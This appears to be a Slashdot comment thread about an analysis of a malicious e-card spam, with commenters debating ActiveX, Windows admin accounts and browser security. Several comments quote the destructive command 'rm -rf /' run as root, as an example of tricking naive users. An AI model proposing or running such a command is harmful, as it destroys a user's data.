Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

I hate ecards

[jwthompson2]

This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.

Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

---
Mod me down, I'm already -1...woot!

Re:I hate ecards

[ONOIML8]

"Of course as a Mac user I don't have much to worry about with this."

Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).

But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

Re:I hate ecards

[jwthompson2]

I Agree. I have all my security settings turned to an appropriate level. With the exception of trusted sites, everyhting that happens requires my acceptance, so I am personally fairly safe, as far as I can be proactively. I can't say this with any certainty but other than IE do any other browsers allow installation of a remote file at all, let alone over top of an existing file? Plug-ins don't autoinstall on my Mac and javascript and Java run in a 'protected box' that limits their access to the system if I recall correctly. So this sort of thing really isn't an issue if all of that is as I believe.

Re:I hate ecards

[ONOIML8]

"...so I am personally fairly safe, as far as I can be proactively."

Well put.

I'm not sure about browsers allowing file installation. I mean I know that Netscape/Mozilla will let you do that (like when adding themes) but you have to give permission first. As long as the browser source hasn't been tampered with I think it's ok. But it would be interesting to know from....well someone who knows for sure.

Re:I hate ecards

[lightspawn]

Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

Our society is fed up with poverty, disease and famine, but there's nothing to be done about those either.

Microsoft is a huge, rich company. If they can't write secure software it can't be done, and anyway it's always the fault of the bad guys for doing bad stuff, never the fault of the company making it possible in the first place.

(note - it's not my opinion, but I did talk to Joe Sixpack a few days ago and he said everybody except us geeks agreed that was the case).

Re:I hate ecards

[Spoing]

1. But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

OK, why should we be worried again? (HTML off btw).

Re:I hate ecards

Maybe you happen to be running a plain-text e-mail client that wipes your hard drive whenever it receives a message with the word 'Viagra' in the subject line? Who knows.

I can make my Windows box safe from hackers... just unplug the ethernet cable. Accept whatever risk you want.

Re:I hate ecards

[Spoing]

1. Maybe you happen to be running a plain-text e-mail client that wipes your hard drive whenever it receives a message with the word 'Viagra' in the subject line? Who knows.

1. Nope. Evolution.

2. Why special-case filter on anything these days?

1. I can make my Windows box safe from hackers... just unplug the ethernet cable. Accept whatever risk you want.

Why accept any risk?

(Nit: 'crackers' are the bad guys, 'hackers' are the good guys.)

Re:I hate ecards

If we all encouraged our banks to adopt rotating password systems (such as with various Swiss banks, you have a printed rotating list of passwords, or a calculator that generates them) that you use also with your password, then the keyloggers would be useless.

Username: sdfhdsh
Password: gjhfdhdf
Rotating pass: ABCD -- please Mr Banker !!!

Personally, I wouldnt use any other form of internet banking. And yet, the biggest banks in the US and Australia don't use it!

What this boils down to is: slack and pathetic banking security, where responsibility for your account being leeched is your own!

Re:I hate ecards

[fermion]

Wouldn't modification of default internet security settings go a long way to resolve this particular instance?

Yes it would, and as mac user you should be concerned. Apple has been behaving extremely irresponsibly. HTML and images are turned on by default in the .mac web client and mail.app. Furthermore, all commuication is readable only with images and HTML turned on. Therefore, if one wants to know the latest stuff at Apple, one is forced to engaged in highly risky activities.

At some point someway may target Mac users. Although Apple does more than many companies to protect the user, thier ad department is clearly putting users at risk.

Frightening

[JackBuckley]

This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.

Re:Frightening

[Alizarin+Erythrosin]

Quite right. Not only can it be dangerous to your PC or bank account (if they install a key logger too, for example), but stuff like this steals your bandwidth, which some people in this world still pay for by amount, not a flat rate.

Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

Re:Frightening

[harmonica]

Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin priviledges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

Re:Frightening

[swordboy]

A large fortune to anyone who creates an anti-spyware/adware package for Windows users who don't know the slightest bit about vulnerabilities like this. I'll pay lots of money for it. Until then, I'm still happy to charge people $50/hr to remove this crap.

Alternatively, create a replacement for IE and Outlook that *look* like IE and Outlook. With this, I'll be able to replace Microsoft products with good (and possibly open-source) products without people bitching that they don't know how to use it.

I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE. I don't care if Mozilla is better because old habits are *very* difficult to break. It only takes about a month of screwing up the shift+click thing before I uninstall Mozilla and go back to IE. I won't even talk about that stupid dinosaur splash screen.

Help!

Re:Frightening

I don't care if Mozilla is better because old habits are *very* difficult to break.

Funnily enough I don't find that. A few months ago I was adamant that I'd never switch away from IE for that very reason. Then one night I had a vision in which a dinosaur clothe`d all in white... sorry, got a bit carried away there. One night I decided to try giving Firebird (as it was then) a real chance. Now whenever I find myself using a machine with only IE installed... I hit the wrong shortcut keys and get all frustrated.

Yep, those are the same shortcut keys I thought I'd never be able to live without.

Re:Frightening

[darien]

I dunno about shift-click, but I just click the little wheel on my mouse on a link and Mozilla opens it in a new tab. Which I (personally) think is way friendlier...

Re:Frightening

[mkoenecke]

On Firefox 0.8, Shift-click certainly *does* open a new window, so I don't know what you are talking about. However, I've gotten so used to middle-click (open in new tab), which is quicker, that I had not checked before. Get Firefox instead.

Re:Frightening

[diablobynight]

They make tons of programs like this. Symantec for instance, the problem I see with them, is the very problem Microsoft tried to avoid in the beginning.
my friend had Norton Internet security or some such bullshit on, and we could never figure out why she couldn't share out any of her files, or get at our files, on our personal network, then we found out Norton was blocking file sharing, and you didn't know it, unless you dug through the program and found the right option. Personally I find the nuisance that it presents to be greater than the risks. Because a simple process of not opening unknown email will solve most of your problems.
Also, someone above said that people are getting 500$ phone bills from Russian hotlines after clicking a link.
apparently those russians are smarter than me, cause I don't know how to increase someones phone bill by having them click a link. Click a link, insert credit card number, or have modem dial out to another number, maybe. But just click the link, then suddenly get bill a month later. It's this kind of exageration that causes people to get over excited about security and put on programs like blackice, that just kill your system all the time as apposed to a virus that might get it some of the time.

Re:Frightening

[Cecil]

I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE ... I won't even talk about that stupid dinosaur splash screen.

Wow, are you trolling or what? First of all, as of this writing, shift-clicking on a link in FireFox (formerly Firebird) does open it in a new window, although god knows why you'd want to do that when you can middle-click to open it in a tab in the background instead.

Secondly, the "stupid dinosaur splash screen" (which I loved) has been gone for about 4 release versions of Mozilla now, to be replaced with a hideously drab orange box with 'Mozilla' written in it. Now that we've compromised on an ugly splash screen, no one's happy. Hooray for attempting to pander to everyone!

Re:Frightening

[Trurl's+Machine]

Alternatively, create a replacement for IE and Outlook that *look* like IE and Outlook.

Said replacement already exists. It is IE and Outlook... for Mac ;-).

Re:Frightening

[Crash6-24]

Microsoft employs some very smart people...
A company can employ many smart people, ignore them, and appear to be run by idiots. Many times management is using something other than technical criteria to decide what to do - like finances, legal implications, massive ego, etc.
What makes the Dilbert(R) comic strip so funny? That the smart people are managed by technically-clueless people.

Re:Frightening

[herulach]

Maybe you should try Firefox, no splash screen, and the shift click opens in a new window, as in IE. Admittedly, its not exactly the same, the window opens the same as the parent, so if thats maximized so is the child. But its pretty damn similiar, and i imagine theres a way to change the behaivour. I think ctrl-click in firefox is much more useful (opens link in a background tab).

Re:Frightening

[swordboy]

Wow, are you trolling or what?

No.. not trolling... just very frustrated...

I'd haven't tried firefox because it isn't to version 1.0 implying that it isn't ready yet.

But my whole point is that I can hardly expect someone to adopt a new browser if I can't even break a simple habit myself. Open source could have a large share of the market if the stuff just looked and acted like Microsoft products minus the insecurity.

Re:Frightening

[rworne]

I don't know how many times I've looked for illicit crap on the net only to find my machine downloading .exe files on the sly while opening a web page.

It's even more interesting and amusing when Safari does it.

If that .exe file was downloaded on a windows box and executed, it could install a dialer program of somesort. Then it would simply dial out late at night to some pay-per-call number. That's how clicking a link will get you a phone bill.

If you have broadband, yank that old modem or disable it in the bios if it's built-in. This is especially true if you have people using the computer who show no common sense with e-mail or security in general.

Problem solved.

Re:Frightening

[1u3hr]

I don't know how to increase someones phone bill by having them click a link.

Here's a whole page of dialers that do stuff like that. A bigger problem in Europe I've heard.

Re:Frightening

[toddestan]

I still use IE because Mozilla doesn't SHIFT+Click with the same behavior (open in new window) as IE. I don't care if Mozilla is better because old habits are *very* difficult to break.

I don't know about Mozilla so much, but shift+click on Opera opens a new window like IE. Ctrl+shift+click opens a link in a new window in the background, a feature that you will probably find extremely handy.

Re:Frightening

[orkysoft]

If Firefox were made by Microsoft or some other company, they'd have called the 0.8 version at least 4.0. (Besides, it's based on Mozilla, which has been > 1.0 for ages now.)

Commercial companies and open source projects have very different version numbering schemes. Version 1.0 of Commercial Program X is much more likely to be buggy crap than a similar program, Version 1.0 of Open Source Program Y.

Re:Frightening

[diablobynight]

how does an executable get downloaded and installed without you clicking yes, install me. Do you have your security set lower than default?

Re:Frightening

[diablobynight]

Does your machine just download those EXE without prompting you if it's ok, mine prompts me and I say "no". Simple as that, don't click yes to programs installing in your computer, much like you don't just let strangers in your house.

Re:Frightening

[xenoandroid]

Both of which are no longer under development for the mac.

Re:Frightening

[rworne]

No, as a matter of fact it doesn't say anything at all. Sometimes I catch a brief flash of a window appearing and disappearing, that's all.

Usually what's left (in Virtual PC running Windows 2000) is some wierd executable sitting in the root directory of the C drive.

In OS X, on the two or three times it's happened there, it just downloads to the desktop. And I've never been prompted to accept the download, and I turned off all the auto-install crap in IE. Safari can just do what it wants for now.

None of it matters all that much, the executables do nothing in OS X, and Virtual PC is set up to "roll back" to a known state and discard changes to the disk. So if it gets infected with God-knows-what, I just restart it and all is well.

Re:Frightening

[danielsfca2]

Ok. First off, orkysoft is right, Firefox is pretty much rock-solid. I haven't had any problem with 0.7 or 0.8 (haven't used older versions).

> if the stuff just looked and acted like Microsoft products minus the insecurity.

Stop what you're doing right now. Go download Firefox and Thunderbird. Install and use them. Spend 2 minutes applying a tweak or two to the prefs.

Instant drop-in IE replacement (and a decent OE replacement for a .3 release). I'm sure anybody who does this stuff professionally wouldn't have a problem duplicating the resulting set of prefs for future automatic use.

Now, to address your comment another way, many things about the way IE "looked and acted" SUCK! For example, the toolbar--by default, about 15 huge 32x32 icons with text labels underneath. Most of which are useless. Plus those buttons and toolbars MS allows 3rd parties to add. So every crapware program on the computer adds a browser toolbar, and a button or two to the main toolbar. That's stupid. Contrast FF's default toolbar: Small buttons for back, forward, refresh, stop, home. Address bar in the same toolbar, plus a search box included. All in the same one-line toolbar. Far superior. Did it take time to get used to? About five minutes. The only people who would argue that IE's default (and by default I mean "for all the average joe cares, it's hard-coded) layout is desirable are those idiots who think all change is scary and harmful.

As a bonus, and getting back on topic FF of course doesn't support instant ActiveX installation of browser toolbars and other assorted stupidity.

Re:Frightening

[Reziac]

They "made up for" removing the dinosaur splash screen (which at least gave me something to look at while Mozilla takes its time loading) by impaling his bloody head on the desktop icon, without providing any less eye-searing alternatives. Man, can you imagine the devlist flamewars that went on over this?

Personally, I don't like tabs, but to each his own...

Re:Frightening

[1u3hr]

how does an executable get downloaded and installed without you clicking yes, install me. Do you have your security set lower than default?

I don't run IE. Usually a Trojan I suppose: "install this plugin for free 3D porn" etc I guess.

Re:Frightening

Place a custom Mozilla.bmp in your mozilla directory, this will overwrite that "stupid dinosaur splash screen"

You might remember me

Hi. I'm Troy McClure. You might remember me from such e-mail how-to videos as "Nigeria: Your Path to Riches" and "Can I Lengthen my Penis 73 inches if I answer 22 emails?"

Re:You might remember me

[ggvaidya]

... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

Re:You might remember me

[bobkate_nz]

The other reason that trojans are more popular than 'real viruses' is that they're (like STDs) the gift that keeps on giving.

No matter how much of a clueless gumby you are, you're always going to realise and react sooner to a virus that destroys data than malware that spys/keylogs/proxies/spams etc. If the virus destroys its host, or is obnoxious enough that the luser removes it promptly, there is far less opportunity for it to spread.

Blaster(TM) is a good illustration.... how often do you hear about a hard-drive-deleting type virus that is so prevalent on some universitie's network that an unpatched workstation gets infected after 16 seconds?

Re:e-cards

[bad+enema]

Yes, but they do cost a person their time. Not very much, but I think it can be safely said that most e-cards are more fun to receive than normal greeting cards. And the quality of the e-card depends on how long the person has spent to pick it out.

AOL Falling behind?

[Faith_Healer]

Any one else notice that the mail is originaly from a compuserve address? I thought that the new AOL was suposed to be safe? =)

Re:AOL Falling behind?

Noob, that is the HELO line, read what is in the parenthesis for the actually origin.

Re:AOL Falling behind?

[scambaiter]

It actually isnt. A lot of spam has forged headers to looke like its coming from compuserver.com, aol.com, hotmail.com or microsoft.com. Never seen any of the given IPs resolve to one of those domains though.

ok....

[clester]

Phew, that would be scary if I used Windows....

Bah

Doesn't affect me, Console e-mail with Mutt is the way to go. Mutt works on Cygwin, so Windows users don't have an excuse.

Re:Bah

Mutt works on Cygwin, so Windows users don't have an excuse.

Gee, that strikes me as so much easier to install and use than using Mozilla thunderbird with HTML turned off.

Re:Bah

Thunderbird has too many bugs to be usable.

Personally, I haven't run into any. What have you encountered? In any case, "too many bugs to be usable" is certainly an exaggeration.

Plus I like looking at a dark terminal when reading mail. Is there a way to make Thunderbird show a black background while reading emails?

Probrably, but me not being a douchebag, I haven't looked into it.

Re:Bah

[orthogonal]

Plus I like looking at a dark terminal when reading mail.

Personally, when reading email I prefer looking into a dark monolith that's full of star for pixels.

Unfortunately, that doesn't run under cygwin because it's forever off-limits to us: while all the other worlds are ours, the monolith's on Europa, and we can attempt no landings there.

Maybe I can get Thumderbird to show... naw.

Re:e-cards

[jwthompson2]

Interesting take. I know my wife likes ecards because it is of course free which beats a card and stamp. She doesn't use them very often, except when she comes across a particularly funny or expressive one, and only when we forget to get a real card... :-)

---
Mod me down...I'm already -1....woot!

Spam in Outlook

[DoorFrame]

I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user openning an attachment or clicking on an off-email link? Any examples?

Re:Spam in Outlook

1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.

Re:Spam in Outlook

[dave420-2]

The real problem isn't the technology, but the users. The same principle behind users opening unknown attachments also exhibits itself in the form of people deleting their windows directory.

Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.

Remember "security through obscurity"? Well, the reverse applies, too.

Re:Spam in Outlook

[77Punker]

As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

Re:Spam in Outlook

[Swanktastic]

As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if you're box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

Of course, it could be pointed out that this is true for any piece of software.

It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD box is not secure either.

I think the real answer to the Original Poster's question is "Probably not." It seems to me that 99% of viruses use public, well known exploits to compromise unpatched systems. It seem to be a much rarer occurance where some black hat out there discovers the exploit and crafts a successful worm/virus/whatever around it.

Re:Spam in Outlook

[MooCows]

This argument has been going on forever.
And, IMHO, is only partly correct.
Windows and it's apps have many "by design" security flaws.

Short list:
- Horrible data-binding in many apps (IE/Outlook/etc)
- Enabling scripts in emails to run in the local zone
- No warnings for insecure passwords
- NetBIOS open by default for the internet
- IIS, period
- Null sessions
- Password hashing flaw (l0pth)

Some of these are fixed, some are not.

Apache runs on the majority of servers, and it isn't by far hacked as much... just figure.

Re:Spam in Outlook

[DR+SoB]

Sure, as soon as the next buffer overrun, or HTML exploit is found, it will be.. Examples? Take any of the last exploits, and go back in time, and at their you have it..

True: If your system is updated you are secure against OLD exploits. Here's the issue, knowing exploits happen at a given rate of like 1000 a month (haha, okay, say 1/2 a month.. whatever.), then ever time a new exploit comes out, you could have a virus uploaded (well DOWNLOADED actually) and executed, without an attachment being opened (that preview pane sure is nice, eh?)..

Re:Spam in Outlook

[corbettw]

The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released.

Actually, a virus that targets Linux (or any other UNIX look alike, eg Solaris) would make huge headlines. At least in the trade rags. Why? Because it's never happened before. The uniqueness of it alone would be cause to put it on the front page of every IT and Security publication in the world.

Re:Spam in Outlook

[msoftsucks]

If you have any portion of ActiveX enabled - YES! There are so many ActiveX exploits that it is almost impossible to have a usable IE that is safe. If you totally turn off ActiveX, you constantly get nagged about how its turned off and that the page may not render properly. I finally switched from IE to Firebird when I had to clean up over 30 machines infected with a variety of spyware. The forensics analysis showed that the spyware came from e-mail (Outlook), various web sites and from holes in M$ JVM. Apparently, there are now exploits that take advantage of the security holes that are in Microsoft's Java runtime. It was a mandatory install in XP SP1, can't be unistalled, and M$ is no longer providing security fixes for it. The only way to resolve this security exploit is to install someone else's JVM (I installed Sun's).

As long as you are running M$ software, you are vulnerable. No amount of press releases stating that Microsoft now "gets" security is going to change that.

Re:Spam in Outlook

[ameoba]

I suggest you go to a public computer lab running 2k/xp. Even a good one that's locked down, the machines are going to get clogged by spyware/adware/crap.

Re:Spam in Outlook

Here we go again; it is still the user's fault!

Bull! Most of the capabilities that this article describes happen as soon as the user clicks on a link in the email. In no way should displaying a web-page allow this kind of malicious activity.

You know, most hardcore Windows users remind me of the old joke about the alcoholic:

"Because of drinking, I lost my wife, my family and my job. Then, because I wouldn't quit drinking, I lost my car, my house and my dog even ran away." He pauses thoughtfully, looking at his glass of bourbon. "But, you know what, I'm gonna give it just one more chance!"

Re:Spam in Outlook

[hymie3]

They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

I would argue that the person saying "type in rm -rf /" is the d umbass, not the untrained person who trustingly followed directions.

Re:Spam in Outlook

[77Punker]

True, true! The fortunate thing about UNIXes is that most of your programs will be running as normal users, therefore all of those exploits will have little control over the machine. Windows, however, is usually run with a single user despite XP's ability to have multiple users. Windows can be secure on its own (my XP box is) if you know what security is.

Re:Spam in Outlook

1. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

In online chat for games and other places, I've seen people tell nubies "That's a special menu, press ALT-F4 to bring it up". Madly typing "NOOOO!!!!!" doesn't help, as a moment laters "BossMan has disconnected" appears on the screen.

Re:Spam in Outlook

[Spoing]

I'll add;

- Using file name extentions to identify files and to choose what will process the contents those files
- Hiding those same extentions by default

These alone are a large part of the problem with Windows security.

Re:Spam in Outlook

[Glenn+R-P]

They just sit there, willingly running anything given to them

My recently-coined name for them is e-rubes. After "rube", an
awkward unpolished usually gullible rustic ignorant of urban ways
(Webster's 3rd Intl). "I-rubes" is another possiblity but I
prefer "e-rubes".

What amazes me is how many of them there are, evidenced by the spread
of social-engineering trojans, one after another.

Re:Spam in Outlook

[fermion]

It is the standard processing engineering problem that has faced us long before computers were widely known. How do we create a process that will insure the job gets done properly. Of course, we could come up with some half ass process over a couple beers. When crap is produced, we can just the incompetent workers/users. Or, we could use our full ass, do our job, and create a process with inherent safeguards and quality checks.

Windows has been a half ass effort. Your example has little merit. Opening up an unknown attachment is not the same thing as logging is as root. True, we try to educate users to do neither, but the similarity ends there. No *nix system I know of logs in as root automagically. Some payloads in Outlook are loaded automagically. We can disable email attachments altogether, but at some cost. We can keep the root system away from the *nix user at almost no costs.

*nix system people are thinking hard about security. The sudo command is one good piece of evidence. It allows the user to run a command as root without permanently switching to the root account. Forgetting to log out of root was a major security issue. Sudo partially solves that problem

The most frightening bit here

[Rope_a_Dope]

ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an Activex control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

Re:The most frightening bit here

[ggvaidya]

I think you have to be Administrator for the re-write to work. Then again, most of the people I know run as administrator, so ...

Re:The most frightening bit here

[bhtooefr]

There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled.

Re:The most frightening bit here

[CdBee]

"Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

(MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.

Re:The most frightening bit here

[moonbender]

I assume windowsupdate.microsoft.com uses an ActiveX component, as well.

Re:The most frightening bit here

[FSWKU]

Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't upgrade the machines (933mhz systems) to anything higher than Win98. Come to think of it, it's somewhat of a miracle that I can even remote into my system at all from there.

Re:The most frightening bit here

[lordDallan]

The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

Re:The most frightening bit here

[mao+che+minh]

That's the thing about ActiveX: as long as it is signed (and not expired), or you decide to trust it anyways, ActiveX has whatever permissions the user that is launching it does. Pretty fucking stupid, huh?

Re:The most frightening bit here

[SlashDread]

Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch to a normal user in a blink..

"/Dread"

Re:The most frightening bit here

[kinnell]

Is there anybody that actually uses ActiveX on a webpage

I'm forced to use IE at work with the "prompt before accepting activeX components" option turned on. You think pop-ups are bad, you should try this! It seems to be used for any kind of plugin (flash, etc), and most pages with adverts, even slashdot, contain activeX of some kind. It really highlights how dangerous IE is - even when you're prompted, you don't know what you're accepting - you could be trying to view a PDF file - and if you accept it you are compromising your system, even if it's just user files at risk. When you consider the number of people routinely running potentially dangerous activeX components without realising it just by surfing the internet...it's unbelievable.

Re:The most frightening bit here

> and not a happy compromise like Win 2K's "Power User"

Power User is pretty powerfull. I believe it can overwrite files in the Program Files folder, so is almost as dangerous as Administrator. I'm usually running as Restricted User on Win2K, the RunAs service works reasonably well for installing new software or tinkering in Computer Manager.

Re:The most frightening bit here

[Threni]

> Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch
> to a normal user in a blink..

Can't you log on as a normal user and then do a `run as administrator` on it?

Re:The most frightening bit here

[0123456]

Yeah, agreed: I tried running with that option on for a while, and IE was basically unusable. Of course that was before I switched to Mozilla.

Re:The most frightening bit here

[jodio]

XP does have "power user"

Re:The most frightening bit here

[LostCluster]

ActiveX is not sandboxed at all like Java is. So, like any powerful tool, it can be used for both good and bad.

Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.

When it comes down to it, ActiveX controls are just as powerful as any other executable, which is why the user is presented with a security certificate before they run. I think the critical flaw in ActiveX is right there at that dialog box, because the default answer is "Yes" and users don't read the whole thing to understand what it means.

Re:The most frightening bit here

[DAldredge]

I know that that doesn't work for NeverWinter Nights. You have to be logged in as Admin for that to work.

Re:The most frightening bit here

[smellystudent]

It is indeed a miracle! How the heck did you get Remote Desktop installed on Windows 98?

Re:The most frightening bit here

[just+fiddling+around]

Another flaw: i get to check "always trust Hackerboy" box, but there is no "never trust Hackerboy" box for me to check. Would work wonders on my blood pressure...

Re:The most frightening bit here

You're mistaken. It uses VB-Script.

Re:The most frightening bit here

[kisrael]

You know, that kind of assymetry shows up a few places in Windows, and it's always annoying.

Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"

Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...

Re:The most frightening bit here

[Technician]

Windowsupdate spring to mind as web-based uses of ActivX.

That explains the Error in line ... message I get when I visit Microsoft.com with active-X off. I thought they were just bad HTML coders.

Re:The most frightening bit here

[LostCluster]

"No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

Re:The most frightening bit here

[moonbender]

From the Windows Update FAQ (my markup):

What is an ActiveX control?
ActiveX Controls are reusable software components that incorporate ActiveX technology. These components can be used to add specialized functionality, such as animation or pop-up menus, to Web pages, programs, and software development tools. Windows Update uses ActiveX controls to check what software is installed on your computer in order to provide you with a correct list of updates and other software you may want to download.

Also, try disabling ActiveX in IE and running Windows Update - doesn't work. That's not to say it doesn't use VBScript in addition to ActiveX, of course.

Re:The most frightening bit here

[kisrael]

"No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

No it wouldn't be redundant, different behaviors are impled, since it's not "No to ALL files I selected to copy", it's "no to all files with a name collision"

I'm thinking of copying a bunch of files (say, W, X, Y, and Z) into a directory that already has some files with the same name. (say, X and Z)

W copies fine.
X brings up that dialog:
"Yes"--copy X, copy Y, ask about Z
"Yes to all"--copy X, copy Y, copy Z
"No"--skip X, copy Y, ask about Z
"No to all"--skip X, copy Y, skip Z
"Cancel"--skip X, skip Y, skip Z

Now, this is obviously a trivial example, but if you have a large number of files, where you want all the files that were in the source directory but don't want any existing file in the destination directory changed, the assymetry in the dialog is annoying.

Re:The most frightening bit here

"There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled."

And running code you find on a website is a way of avoiding virusen?

Re:The most frightening bit here

[misleb]

Windows Update depends on ActiveX to determine which updates a user already has.Many virus-scanning websites need to be able to read and (and when cleaning, write to) every file on the system, so they need ActiveX too.

Maybe it is time the world gave up on these mega-web-applications. Why can't Microsoft write a damn standalone Windows UPdate application that doesn't use a browser.... like Apple does on OS X? Why does everything need to be web based these days? Sandbox the damn ActiveX crap, restrict user privilges by default, tighten Explorer security settings BY DEFAULT, and ship a standalone app for everything that you can. If Microsoft wants to improve security, they are ultimately going to have to stand up to users and say, "You know what? We will only trade so much security for convenience. Deal with it."

-matthew

Re:The most frightening bit here

[abb3w]

"Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

To answer both of those questions: Microsoft Windows Update is DirectX based.

Re:The most frightening bit here

[HD+Webdev]

I know that that doesn't work for NeverWinter Nights. You have to be logged in as Admin for that to work.

Install the application into your non-admin user "/documents and settings/whoever" area instead of "/program files".

Re:The most frightening bit here

I work for a large, allegedly tech-savvy company. Every one of the tens of thousands of laptops we distribute to employees has the user running as Administrator.

Re:The most frightening bit here

[badzilla]

I try and make my kids run using an account without Administrator rights on their games machine, unfortunately that is a complete nightmare. Every few minutes it's "Dad... I can't install Megablaster 2 Railgun Edition" or "Dad... Flopsy Bear Print Studio says access denied".

And this is after spending a great deal of time putting friendly NTFS permissions onto their "c:\games" directory. If only makers of entertainment software would clean up their act! Surely these things don't actually NEED to have root all over the place.

Re:The most frightening bit here

there's an 'e' in ActiveX.

Re:The most frightening bit here

[pavera]

They very well might...
the most common reason why programs need to be run as admin is because they need read or write access to the registry in a place that normal users don't have it. In my experience, this has almost always been the case that things want to create a new key in the registry (for a saved game, or for a recent document or something) and they can't write to the registry as a normal user.

Re:The most frightening bit here

[FSWKU]

My personal system is XP Pro. The computers in the office are Windows 98. I simply log in to a webserver containing the Terminal Services Web Client (running on Apache, btw). Alternatively, you can also install the standalone TS client for 98. Can't use the second option due to the afformentioned paranoid dolt turning into Satan himself if he finds out you installed ANYTHING (thankfully we're moving to a new location he has no control over).

Re:The most frightening bit here

[filmsmith]

